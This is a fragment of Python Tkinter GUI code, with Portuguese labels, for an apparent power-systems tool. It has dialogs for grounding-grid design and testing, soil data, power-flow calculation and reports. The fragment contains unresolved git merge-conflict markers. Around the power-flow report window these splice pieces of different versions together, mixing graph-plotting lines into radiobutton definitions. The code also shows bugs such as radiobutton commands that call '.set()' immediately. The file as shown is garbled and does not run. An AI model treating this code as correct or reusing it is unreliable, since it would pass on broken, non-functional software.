config_draw_prot = tk.Toplevel()
config_draw_prot.title("Ferramenta em análise para desenvolvimento")
config_draw_prot.geometry("1100x700")
config_draw_prot.wm_iconbitmap("images/logo_pySEP.ico")
config_draw_prot["bg"] = "light goldenrod"
frame_info_draw_prot = tk.LabelFrame(
master=config_draw_prot,
bg="light goldenrod",
text="Ferramenta em análise para desenvolvimento",
font=("Helvetica", 20)
)
frame_info_draw_prot.pack(fill='both', expand=True)
def __malha_terra_testar(self):
config_testar_malha = tk.Toplevel()
config_testar_malha.title("Testar projeto de malha de terra")
config_testar_malha.geometry("660x215")
config_testar_malha.wm_iconbitmap("images/logo_pySEP.ico")
config_testar_malha["bg"] = "light goldenrod"
frame_teste_malha = tk.LabelFrame(
master=config_testar_malha,
bg="light goldenrod",
text="Testar Projeto de Malha de Terra",
font=("Helvetica", 20)
)
# frame_teste_malha.pack(fill='both', expand=True)
frame_teste_malha.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL Profundidade das Hastes
label_profundidade_hastes = tk.Label(
master=frame_teste_malha,
text="Profundidade das hastes [m]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_profundidade_hastes.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_profundidade_hastes = tk.Entry(
font=("Helvetica", 15),
master=frame_teste_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_profundidade_hastes.focus_set()
entry_profundidade_hastes.grid(row=0, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL Profundidade das Hastes
label_iteracoes = tk.Label(
master=frame_teste_malha,
text="Número de iterações: \nQuanto maior, mais preciso o cálculo simples. ",
font=("Helvetica", 14),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_iteracoes.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_iteracoes = tk.Entry(
font=("Helvetica", 15),
master=frame_teste_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_iteracoes.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR
def __add_butt_salvar():
profundidade = float(entry_profundidade_hastes.get())
print('\n\nProfundidade das hastes = ', profundidade)
iteracoes = int(entry_iteracoes.get())
print('\n\nProfundidade das hastes = ', iteracoes)
print('\n\n\n=========================== TESTE SIMPLES DO PROJETO DA MALHA DE TERRA ======================')
self.__malha.testar_ri_v(profundidade_haste=profundidade, iteracoes=iteracoes, show=True)
if self.__malha.get_teste() is False:
print('\n\n\n======================= TESTE COMPLETO DO PROJETO DA MALHA DE TERRA =====================')
self.__malha.testar_vmalha_vtoq(show=True)
self.__malha.testar_vpsm_vpasso(show=True)
config_testar_malha.destroy()
butt_add_salvar = tk.Button(
master=config_testar_malha,
text="Testar!", font=("Helvetica", 12), height=2, # width=30,
bg="goldenrod",
bd=3,
command=__add_butt_salvar,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_salvar.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def __malha_terra_add_info(self):
config_info_malha = tk.Toplevel()
config_info_malha.title("Informações de Projeto da Malha de Terra")
config_info_malha.geometry("1100x700")
config_info_malha.wm_iconbitmap("images/logo_pySEP.ico")
config_info_malha["bg"] = "light goldenrod"
frame_info_malha = tk.LabelFrame(
master=config_info_malha,
bg="light goldenrod",
text="Informações de Projeto da Malha de Terra",
font=("Helvetica", 20)
)
frame_info_malha.pack(fill='both', expand=True)
# LABEL ADD Icc
label_add_icc = tk.Label(
master=frame_info_malha,
text="Corrente de curto-circuito [A]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_icc.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_icc = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_icc.focus_set()
entry_add_icc.grid(row=0, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD Imalha
label_add_imalha = tk.Label(
master=frame_info_malha,
text="Corrente de malha [A]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_imalha.grid(row=0, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_imalha = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_imalha.grid(row=0, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD tempo protecao
label_add_t_protecao = tk.Label(
master=frame_info_malha,
text="Tempo da proteção [s]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_t_protecao.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_t_protecao = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_t_protecao.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD tempo defeito
label_add_t_defeito = tk.Label(
master=frame_info_malha,
text="Tempo do defeito [s]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_t_defeito.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_t_defeito = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_t_defeito.grid(row=1, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD temperatura ambiente
label_add_temp_ambiente = tk.Label(
master=frame_info_malha,
text="Temperatura ambiente [C°]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_temp_ambiente.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_temp_ambiente = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_temp_ambiente.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# LABEL ADD temperatura máxima permissível
label_add_temp_max_permissivel = tk.Label(
master=frame_info_malha,
text="Temperatura máxima permissível [C°]: ",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_add_temp_max_permissivel.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
entry_add_temp_max_permissivel = tk.Entry(
font=("Helvetica", 15),
master=frame_info_malha,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_add_temp_max_permissivel.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR
def __add_butt_salvar():
icc = float(entry_add_icc.get())
print('\n\nIcc = ', icc)
imalha = float(entry_add_imalha.get())
print('Imalha = ', imalha)
t_prot = float(entry_add_t_protecao.get())
print('tempo protecao = ', t_prot)
t_def = float(entry_add_t_defeito.get())
print('tempo defeito = ', t_def)
temp_amb = int(entry_add_temp_ambiente.get())
print('temperatura ambiente = ', temp_amb)
temp_max = int(entry_add_temp_max_permissivel.get())
print('temperatura maxima = ', temp_max)
self.__malha.add_icc(i_cc=icc)
self.__malha.add_i_malha(i_malha=imalha)
self.__malha.add_t_protecao(t_protecao=t_prot)
self.__malha.add_t_defeito(t_defeito=t_def)
self.__malha.add_temp_ambiente(temp_ambiente=temp_amb)
self.__malha.add_temp_max_permissivel(temp_max_permissivel=temp_max)
config_info_malha.destroy()
butt_add_salvar = tk.Button(
master=frame_info_malha,
text="Salvar!", font=("Helvetica", 12), height=2, # width=30,
bg="goldenrod",
bd=3,
command=__add_butt_salvar,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_salvar.grid(row=3, columnspan=5, padx=5, pady=5)
def __calc_fluxo_plot_tensao(self):
self.__circuito.plot_conv(tensao=True, ang=False)
def __calc_fluxo_plot_angulo(self):
self.__circuito.plot_conv(tensao=False, ang=True)
def __calc_fluxo_perdas(self):
self.__circuito.relatorio(show_tensoes=False, show_correntes=False, show_fluxo=False)
self.__circuito.perdas(show=True)
self.__text_status.set("Perdas do circuito!")
def __calc_fluxo_relatorio(self):
self.__relatorio_fluxo()
self.__text_status.set("Relatório Final!")
def __relatorio_fluxo(self): # Talvez depois colocar os resultados em um toplevel ou algo assim
config_relatorio = tk.Toplevel()
config_relatorio.title("Relatório Final do Fluxo de Potência")
config_relatorio.geometry("460x250")
config_relatorio.wm_iconbitmap("images/logo_pySEP.ico")
config_relatorio["bg"] = "light goldenrod"
frame_relatorio = tk.LabelFrame(
master=config_relatorio,
bg="light goldenrod"
)
frame_relatorio.pack(fill='both', expand=True)
>>>>>>> 7de809c (relatório e perdas)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_relatorio,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Relatório Final do Fluxo de Potência",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=6, padx=5, pady=5)
# MOSTRAR TENSÕES: True ou False
__relatorio_tensoes = tk.BooleanVar()
_tensoes_true = tk.Radiobutton(
master=frame_relatorio,
text="Mostrar Tensões: ",
font=("Helvetica", 13),
variable=__relatorio_tensoes,
value=True,
bg="light goldenrod",
command=__relatorio_tensoes.set(True)
)
_tensoes_true.grid(row=2, column=0, sticky=tk.W)
<<<<<<< HEAD
self.__grafo_pos = nx.spring_layout(self.__grafo)
>>>>>>> 29cc7eb (.)
a = self.__teste.add_subplot(111)
a.plot([1, 2, 3, 4, 5, 6, 7], [1, 2, -1, -2, 0, 3, 4])
<<<<<<< HEAD
canvas = FigureCanvasTkAgg(self.__teste, self.__janela)
=======
def __show_grafo(self, a):
self.__frame_grafo.destroy()
self.__frame_grafo = tk.Frame(
master=self.__janela,
bg="light goldenrod"
=======
_tensoes_false = tk.Radiobutton(
master=frame_relatorio,
text=" Não Mostrar Tensões: ",
font=("Helvetica", 13),
variable=__relatorio_tensoes,
value=False,
bg="light goldenrod",
command=__relatorio_tensoes.set(True)
)
_tensoes_false.grid(row=2, column=3, sticky=tk.W)
# MOSTRAR ÂNGULOS: True ou False
__relatorio_corr = tk.BooleanVar()
_correntes_true = tk.Radiobutton(
master=frame_relatorio,
text="Mostrar Correntes",
font=("Helvetica", 13),
variable=__relatorio_corr,
value=True,
bg="light goldenrod",
command=__relatorio_corr.set(False)
)
_correntes_true.grid(row=4, column=0, sticky=tk.W)
_correntes_false = tk.Radiobutton(
master=frame_relatorio,
text="Não Mostrar Correntes",
font=("Helvetica", 13),
variable=__relatorio_corr,
value=False,
bg="light goldenrod",
command=__relatorio_corr.set(False)
>>>>>>> 7de809c (relatório e perdas)
)
_correntes_false.grid(row=4, column=3, sticky=tk.W)
# MOSTRAR FLUXO: True ou False
__relatorio_fluxo = tk.BooleanVar()
_fluxo_true = tk.Radiobutton(
master=frame_relatorio,
text="Mostrar Fluxo",
font=("Helvetica", 13),
variable=__relatorio_fluxo,
value=True,
bg="light goldenrod",
command=__relatorio_fluxo.set(False)
)
_fluxo_true.grid(row=6, column=0, sticky=tk.W)
<<<<<<< HEAD
canvas = FigureCanvasTkAgg(self.__f, master=self.__frame_grafo)
>>>>>>> fbd7d23 (.)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar_grafo = NavigationToolbar2Tk(canvas, self.__janela)
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def set_toolbar(self, janela_main):
toolbar = tk.Frame(janela_main, bg="goldenrod")
=======
_fluxo_false = tk.Radiobutton(
master=frame_relatorio,
text="Não Mostrar Fluxo",
font=("Helvetica", 13),
variable=__relatorio_fluxo,
value=False,
bg="light goldenrod",
command=__relatorio_fluxo.set(False)
)
_fluxo_false.grid(row=6, column=3, sticky=tk.W)
# BOTÃO ADICIONAR
def __add_butt():
info_tensoes = __relatorio_tensoes.get()
print('Mostrar tensões = ', info_tensoes)
info_corr = __relatorio_corr.get()
print('Mostrar correntes = ', info_corr)
>>>>>>> 7de809c (relatório e perdas)
info_fluxo = __relatorio_fluxo.get()
print('Mostrar Fluxo = ', info_fluxo)
self.__circuito.relatorio(
show_tensoes=info_tensoes,
show_correntes=info_corr,
show_fluxo=info_fluxo
)
print("\n\nRelatório Mostrado! ")
self.__label_logo.destroy()
config_relatorio.destroy()
butt_add = tk.Button(
master=frame_relatorio,
text="Mostrar!", font=("Helvetica", 12), height=2, width=30,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add.grid(row=8, columnspan=6, padx=5, pady=5)
def __calc_fluxo(self):
self.__config_fluxo()
self.__text_status.set("Fluxo de potência calculado!")
def __config_fluxo(self):
config_fluxo = tk.Toplevel()
config_fluxo.title("Calcular Fluxo de Potência")
config_fluxo.geometry("460x250")
config_fluxo.wm_iconbitmap("images/logo_pySEP.ico")
config_fluxo["bg"] = "light goldenrod"
frame_config = tk.LabelFrame(
master=config_fluxo,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Calcular Fluxo de Potência",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=6, padx=5, pady=5)
# NÚMERO DA BARRA
label_erro_fluxo = tk.Label(
master=frame_config,
text="Erro de convergência: \nExemplo: 1e-2 ou 0.01",
font=("Helvetica", 15),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_erro_fluxo.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W)
entry_erro_fluxo = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_erro_fluxo.focus_set()
entry_erro_fluxo.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W)
# MOSTRAR ITERAÇÕES: True ou False
__show_iter = tk.BooleanVar()
_iter_true = tk.Radiobutton(
master=frame_config,
text="Mostrar Iterações",
font=("Helvetica", 13),
variable=__show_iter,
value=True,
bg="light goldenrod",
command=__show_iter.set(True)
)
_iter_true.grid(row=2, column=0, sticky=tk.W)
_iter_false = tk.Radiobutton(
master=frame_config,
text="Não Mostrar Iterações",
font=("Helvetica", 13),
variable=__show_iter,
value=False,
bg="light goldenrod",
command=__show_iter.set(False)
)
_iter_false.grid(row=2, column=3, sticky=tk.W)
# BOTÃO ADICIONAR
def __add_butt():
err_flux = float(entry_erro_fluxo.get())
print('\n\nErro iterações = ', err_flux)
show_inter = int(__show_iter.get())
print('Mostrar iterações = ', show_inter)
self.__circuito.calcular_fluxo_pot_nr(
erro=err_flux,
show=show_inter
)
print("\n\nFluxo de Potência calculado! ")
self.__circuito.showBarras()
self.__label_logo.destroy()
config_fluxo.destroy()
butt_add = tk.Button(
master=frame_config,
text="Calcular!", font=("Helvetica", 12), height=2, width=30,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add.grid(row=4, columnspan=5, padx=5, pady=5)
def __grafo_add_edge(self, list_linhas):
self.__f = Figure(figsize=(5, 4), dpi=100)
self.__grafo.add_edges_from(list_linhas)
self.__grafo_pos = nx.spring_layout(self.__grafo)
a = self.__f.add_subplot()
self.__show_grafo(a=a)
def __grafo_add_node(self, list_numBar):
self.__f = Figure(figsize=(5, 4), dpi=100)
self.__grafo.add_nodes_from(list_numBar)
self.__grafo_pos = nx.spring_layout(self.__grafo)
a = self.__f.add_subplot()
self.__show_grafo(a=a)
def __show_grafo(self, a):
self.__frame_grafo.destroy()
self.__frame_grafo = tk.Frame(
master=self.__janela,
bg="light goldenrod"
)
self.__frame_grafo.pack(fill='both', expand=True)
pesos = nx.get_edge_attributes(self.__grafo, 'z')
nx.draw_networkx(self.__grafo, self.__grafo_pos, ax=a, font_color='w', font_size=15,
node_size=700, node_color='saddlebrown', node_shape='s',
width=5, edge_color='black')
nx.draw_networkx_edge_labels(self.__grafo, self.__grafo_pos, ax=a, font_size=20,
node_size=700, node_color='saddlebrown', node_shape='s',
width=5, edge_color='black', edge_labels=pesos, font_color='black')
canvas = FigureCanvasTkAgg(self.__f, master=self.__frame_grafo)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar_grafo = NavigationToolbar2Tk(canvas, self.__frame_grafo)
toolbar_grafo.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def set_toolbar(self, janela_main):
toolbar = tk.Frame(janela_main, bg="goldenrod")
# Adicionar Barra
add_barra = tk.Button(
master=toolbar,
text="Adicionar Novo Nó",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_barra.bind("<Button-1>", self.__add_bar)
add_barra.pack(side=tk.LEFT, padx=2, pady=2)
# Adicionar Linha
add_linha = tk.Button(
master=toolbar,
text="Adicionar Nova Linha",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_linha.bind("<Button-1>", self.__add_lin)
add_linha.pack(side=tk.LEFT, padx=2, pady=2)
# Adicionar Solos
add_solo = tk.Button(
master=toolbar,
text="Informações do solo",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_solo.bind("<Button-1>", self.__add_solo)
add_solo.pack(side=tk.LEFT, padx=2, pady=2)
# Adicionar Malha
add_malha = tk.Button(
master=toolbar,
text="Informações da malha de terra",
font=("Helvetica", 11),
relief=tk.FLAT,
bg="light goldenrod",
bd=2,
justify=tk.CENTER,
)
add_malha.bind("<Button-1>", self.__add_malha)
add_malha.pack(side=tk.LEFT, padx=2, pady=2)
toolbar.pack(side=tk.TOP, fill=tk.X)
def __add_malha(self, event):
self.__config_malha()
self.__text_status.set("Adicionando informações da malha de terra! ")
def __config_malha(self):
config_malha = tk.Toplevel()
config_malha.title("Configurações da malha")
config_malha.geometry("1060x900")
config_malha.wm_iconbitmap("images/logo_pySEP.ico")
config_malha["bg"] = "light goldenrod"
frame_config = tk.Frame(
master=config_malha,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Configurações da malha",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Largura da malha
label_malha_largura = tk.Label(
master=frame_config,
text="Largura da malha [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_largura.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Largura da malha
entry_malha_largura = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_largura.focus_set()
entry_malha_largura.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Comprimento da malha
label_malha_comprimento = tk.Label(
master=frame_config,
text="Comprimento da malha [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_comprimento.grid(row=1, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Comprimento da malha
entry_malha_comprimento = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_comprimento.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Espaçamento da largura da malha
label_malha_esp_larg = tk.Label(
master=frame_config,
text="Espaçamento de cada haste\nno eixo X [0.05 a 0.1]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_esp_larg.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Espaçamento da largura da malha
entry_malha_esp_larg = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_esp_larg.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Espaçamento do comprimento da malha
label_malha_esp_compr = tk.Label(
master=frame_config,
text="Espaçamento de cada haste\nno eixo Y [0.05 a 0.1]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_esp_compr.grid(row=2, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Espaçamento do comprimento da malha
entry_malha_esp_compr = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_esp_compr.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
########################################################################################################################
_frame_profundidade = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_profundidade.grid(row=3, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL profundidade da malha
label_malha_profundidade = tk.Label(
master=_frame_profundidade,
text="Profundidade da malha [m]:",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_malha_profundidade.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
# Informações --> ENTRY profundidade da malha
entry_malha_profundidade = tk.Entry(
font=("Helvetica", 12),
master=_frame_profundidade,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_malha_profundidade.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
########################################################################################################################
_labelframe_periferia = tk.LabelFrame(
master=frame_config,
text="Hastes na periferia? ", font=("Helvetica", 14),
bg="light goldenrod",
padx=2,
pady=2,
)
_labelframe_periferia.grid(row=4, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# HASTES NA PERIFERIA?
__hastes_periferia = tk.BooleanVar()
_periferia_true = tk.Radiobutton(
master=_labelframe_periferia,
text="Sim: ",
font=("Helvetica", 13),
variable=__hastes_periferia,
value=True,
bg="light goldenrod",
command=__hastes_periferia.set(True)
)
_periferia_true.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
_periferia_false = tk.Radiobutton(
master=_labelframe_periferia,
text="Não: ",
font=("Helvetica", 13),
variable=__hastes_periferia,
value=False,
bg="light goldenrod",
command=__hastes_periferia.set(True)
)
_periferia_false.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
_frame_dimensoes = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_dimensoes.grid(row=5, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
_frame_grafo_malha = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_grafo_malha.grid(row=6, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def __show_grafo(a, grafo, pos, f):
_frame_grafo_malha = tk.Frame(
master=frame_config,
bg="light goldenrod",
padx=2,
pady=2,
)
_frame_grafo_malha.grid(row=6, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
nx.draw(grafo, pos, node_color='black', ax=a)
canvas = FigureCanvasTkAgg(f, master=_frame_grafo_malha)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar_grafo = NavigationToolbar2Tk(canvas, _frame_grafo_malha)
toolbar_grafo.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# BOTÃO ADICIONAR Adicionar dimensões
def __add_butt_dimensoes():
largura = float(entry_malha_largura.get())
print('\n\nlargura malha = ', largura)
comprimento = float(entry_malha_comprimento.get())
print('\n\ncomprimento malha = ', comprimento)
esp_larg = float(entry_malha_esp_larg.get())
print('\n\nEspaçamento malha largura = ', esp_larg)
esp_compr = float(entry_malha_esp_compr.get())
print('\n\nEspaçamento malha comprimento = ', esp_compr)
profundidade = float(entry_malha_profundidade.get())
print('\n\nprofundidade malha = ', profundidade)
periferia = bool(__hastes_periferia.get())
print('\n\nHastes na periferia? ', periferia)
if periferia is True:
periferia_true = True
periferia_false = False
else:
periferia_true = False
periferia_false = True
self.__malha.add_dimensoes(
largura=largura,
comprimento=comprimento,
esp_larg=esp_larg,
esp_compr=esp_compr,
profundidade_malha=profundidade,
malha_com_hastes_na_periferia=periferia_true,
malha_sem_hastes_na_periferia=periferia_false
)
__grafo_malha = nx.Graph()
f = Figure(figsize=(5, 4), dpi=100)
a = f.add_subplot()
na = int(largura * esp_larg)
nb = int(comprimento * esp_compr)
nodes = []
for i in range(na * nb):
nodes.append(str(i + 1))
pos = dict()
cont = 0
for i in range(nb):
for j in range(na):
pos[nodes[cont]] = (j + 1, i + 1)
cont += 1
__grafo_malha.add_nodes_from(nodes)
edges = []
for i in range(na):
edges.append(
(nodes[i], nodes[(na * nb) - na + i])
)
for i in range(nb):
edges.append(
(nodes[i * na], nodes[na + (i * na) - 1])
)
__grafo_malha.add_edges_from(edges)
_frame_grafo_malha.destroy()
__show_grafo(a=a, grafo=__grafo_malha, pos=pos, f=f)
butt_add_dimensoes = tk.Button(
master=_frame_dimensoes,
text="Adicionar informações e mostrar malha de terra!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt_dimensoes,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_dimensoes.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
# BOTÃO Salvar informações
def __add_butt_salvar_malha():
config_malha.destroy()
butt_add_dimensoes = tk.Button(
master=frame_config,
text="Salvar informações da malha e sair!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt_salvar_malha,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_dimensoes.grid(row=7, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
########################################################################################################################
#######################################################################################################
def __add_solo(self, event):
self.__config_solo()
self.__text_status.set("Adicionando informações do solo! ")
def __config_solo(self):
config_solo = tk.Toplevel()
config_solo.title("Configurações do solo")
config_solo.geometry("1060x900")
config_solo.wm_iconbitmap("images/logo_pySEP.ico")
config_solo["bg"] = "light goldenrod"
frame_config = tk.Frame(
master=config_solo,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Configurações do solo",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO SALVAR INFORMAÇÕES SOLOS
def __add_butt():
config_solo.destroy()
butt_salvar_solos = tk.Button(
master=frame_config,
text="Salvar informações! ", font=("Helvetica", 11), height=2, width=10,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_salvar_solos.grid(row=0, column=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Brita
label_brita = tk.Label(
master=frame_config,
text="Adicionar Informações da camada de Brita ",
font=("Helvetica", 20),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_brita.grid(row=1, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Brita PROFUNDIDADE
label_brita_profundidade = tk.Label(
master=frame_config,
text="Profundidade [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_brita_profundidade.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Brita PROFUNDIDADE
entry_brita_profundidade = tk.Entry(
font=("Helvetica", 12),
